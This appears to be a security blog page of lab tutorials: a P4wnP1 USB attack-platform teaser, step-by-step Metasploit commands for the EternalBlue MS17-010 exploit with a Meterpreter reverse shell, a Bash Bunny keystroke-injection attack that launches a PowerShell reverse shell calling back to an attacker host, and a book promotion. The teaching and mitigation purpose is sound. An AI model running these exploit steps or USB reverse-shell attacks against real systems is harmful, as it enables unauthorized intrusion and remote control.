P4wnP1 the Pi Zero W USB attack Platform

•September 15, 2017 • Leave a Comment

The P4wnP1 is an exciting and feature rich USB attack platform that runs on a Raspberry Pi Zero.

featured item

The P4wnP1 turns your Pi Zero/Zero W into a physical security Ethical Hacking pentest tool. In this article, we will cover installing P4wnP1 on a Pi Zero W and using several of its payloads against a target system running Windows 10.

For this article, you will need:

  • Rasberry Pi Zero W (I purchased mine from adafruit.com with a case)
  • Raspberry Pi Power Adapter
  • MicroSD Memory card
  • MicroSD card writer
  • P4wnP1 software

You will also need a target computer to plug the P4wnP1 into (I used a Windows 10 PC) and a secondary computer to SSH into the Pi to control and modify the P4wnP1.

Continue reading article on dantheiotman.com



Using the “NSA” EternalBlue exploit on Metasploitable 3

•June 12, 2017 • Leave a Comment

In this tutorial, we will see how to use the “EternalBlue” MS17-010 SMB exploit in Metasploit on Kali Linux to obtain a remote shell in Metasploitable 3, which uses Windows Server 2008.


EternalBlue is one of several tools that were allegedly created and used by the NSA. The tools were publicly dumped by a hacker group called “Shadow Brokers” in April. The exploit has been modified and adapted to work as a Metasploit module and has been added to the latest Metasploit version. EternalBlue is a good exploit for Ethical Hackers to try in a test environment as it works very well and returns a System level shell when successful.


I had to manually update the Metasploit in Kali, as of the time of this writing the EternalBlue exploit was not available in the latest Kali update. Also, there seems to be some issues with the latest Metasploitable 3 install, as several of the service ports that should be open were blocked and it seems some services were not available.

As always, never attempt to access or test a system that you do not have express permission to do so, doing so is illegal and you could end up in jail.


Enough introduction, let’s see the exploit in action!

  • Start the Metasploit framework.
  • In Metasploit, enter “search eternalblue

  • Type, “use exploit/windows/smb/ms17_010_eternalblue

Now you can enter “show options” to see what options are available:

There is not really much you need to do. Just set the target IP (RHOST), and select a payload:

  • set RHOST
  • set payload windows/x64/meterpreter/reverse_tcp

You can type “show options” again to see what options need to be set for the payload, but all we need is the Kali IP address (LHOST):

  • set LHOST
  • Finally, type “exploit

And we have a shell!

You can type “help” top see all the available Meterpreter commands or just type “shell” for a remote command shell:

And that is it!


The best mitigation against this attack is to make sure all of your Windows systems are patched and up to date. This exploit has been patched for a while now. It is also a good idea to disable SMB v1, but you must realize the impact that this could have on your network before doing so, and decide if this would be a viable solution for your company.

If you liked this tutorial and want to learn a lot more about Kali, Metasploit and Ethical Hacking, check out my “Basic Security Testing with Kali Linux 2” book.

Bash Bunny: Windows Remote Shell using Metasploit & PowerShell

•March 27, 2017 • Leave a Comment

In this article, we will see how to use the Bash Bunny to get a full reverse shell on a Windows system using Kali Linux, PowerShell and the Metasploit Web Delivery module.

The USB Bash Bunny is the latest pentesting tool from Hak5. Using this advanced USB attack platform, you can easily perform multiple USB based attacks. The device normally emulates a keyboard and automatically sends typed commands through the USB port as soon as it is plugged in. The Bash Bunny is a programmable device that contains two separate attack modes and an arming mode.

The attack modes are set by a switch on the side. You can set up different scripts to fire whether the switch is in position 1 or 2. The arming position is for loading new scripts onto the device.

When you load an attack script on the device and plug it into the USB port, the script executes. In this case, it will make a Windows system call back to the Kali system and create a full Metasploit shell. The Metasploit shell is nice, because you have complete control over the target.

In Kali Linux, start Metasploit. We will use the Web Delivery script:

The module is pretty straight forward, we set the IP address and port for our Kali system, then select a PowerShell (PSH) based target, and lastly select the reverse TCP Meterpreter Shell. When the module runs, it will provide you with a rather lengthy PowerShell command.

We will take the PowerShell command and use it in our Bash Bunny script. Because the Bash Bunny does seem to parse some of the input, you will need to use a switch character to get it to properly execute the PowerShell command. I had to put a “\” in front of every special character.

The entire Bash Bunny Script:

The PowerShell command is a single line, it just wraps several lines in the picture above. The Q in front of the lines is short for Quack, as a reference to the Hak5 Rubber Ducky. Many of the Ducky scripts will work with the Bash Bunny with some modification.

Basically, the first line tells Bash Bunny to act like a keyboard (HID). The LED command turns the status led to Blue. “GUI R” are the commands needed to open a run prompt in Windows. The delays are so the Bash Bunny has time to type each line in, longer delays for longer commands. And that is it. When the command is done, the LED turns to green.

All that is needed is to save the script to one of the Bash Bunny Payload Switch directories. Then set the switch to the corresponding position and plug it into the target machine.

Shortly after the USB drive is inserted into the Windows PC, we get a remote shell:

After we connect to the session, we have a full Meterpreter shell and basically have full control of the remote system.

Here I just entered the command to pull a remote screenshot, and the resultant screenshot:

Bash Bunny is an exciting and fun tool for any security professional. Once you get the hang of using the device, modifying Rubber Ducky scripts or creating your own is very easy. With the flexibility of the Bash Bunny, the usage scenarios are pretty much limited only by your imagination, and an open USB port.

Hopefully this demonstrates the importance of physically securing your machines. Disable USB ports that are not needed, limit accounts to “User” level authentication, and enable/ monitor PowerShell logging.

(This article is for educational use only. Never try to access a computer that you do not have permission to access. Doing so is illegal (and unethical) and you may end up in jail.)

“Security Testing with Kali NetHunter” Book Overview

•January 18, 2017 • Leave a Comment

nethunter-front-coverMy latest book, “Security Testing with Kali NetHunter” is out! NetHunter brings the power of Kali Linux to supported Android devices.

In this blog post I will cover a quick overview of the book and why I wrote it. This book is the latest in my “Security Testing with Kali” series. If you like my Basic & Intermediate books, I think you will love this one!

I was working on writing a non-Kali based security book, when a good friend approached me and asked if I would create a 50-page quick guide to Kali NetHunter. Being a huge Kali Linux fan, I set my current writing project aside and immediately began on the NetHunter book.

I soon realized that even with trying to make this a quick coverage guide, 50 pages would not even begin to cover the capabilities of this exceptional platform. The ability to use it with wireless and USB based attacks, along with a complement of the normal Kali Linux tools, really makes NetHunter a robust and feature rich device. Add in the fact that it all runs on a small mobile platform and you really have a winner.

To spend the most book time on usage tutorials, with the thought of new devices and platforms at some point being added to the NetHunter supported list, I start the book from the point of a fully installed NetHunter device. Though, I do give an overview of the install process.

This book uses the exact same lab setup as the other books in my Kali series. So, if you already have the lab setup from these books, you just need to connect your NetHunter device to your wireless router.

The book assumes that you already have a level of comfortability with using Kali Linux and have experience connecting to your mobile device using Linux or Windows. From a difficulty level, I would say that this book would fit between my Basic & Intermediate Kali books.

NetHunter includes a couple Android based security tools and a graphical “NetHunter” menu. The book steps you through the Android based attack tools and then goes through each NetHunter menu item as they appear.

Several menu items have an entire chapter devoted to itself.  With the step-by-step tutorials, you can see how the tools work, many times using the tool against our test lab systems.

Along with the NetHunter menu, more experienced users will probably prefer to use many of the Kali tools directly from the terminal prompt. NetHunter uses a slightly reduced install of Kali Linux. You can however install other Kali Metapackages if you wish.

The book topics include:

  • Kali NetHunter Introduction and Overview
  • Shodan App (the “Hacker’s Google”)
  • Using cSploit & DriveDroid
  • Using NetHunter in Human Interface Device Attacks
  • Man-in-the-Middle Attacks
  • Wi-Fi Attacks
  • Metasploit Payload Generator
  • Using NetHunter with a WiFi Pineapple Nano

For the book tutorials, you will need a supported device with NetHunter installed, a host system to run VMWare images, and a supported USB WiFi adapter (I used a TP-Link TL-WN722N).  If you want to follow through the Pineapple Connector chapter you will also need a Hak5 Pineapple Nano.

If you enjoyed my previous books, I think you will really like this one.

Check it out on Amazon.com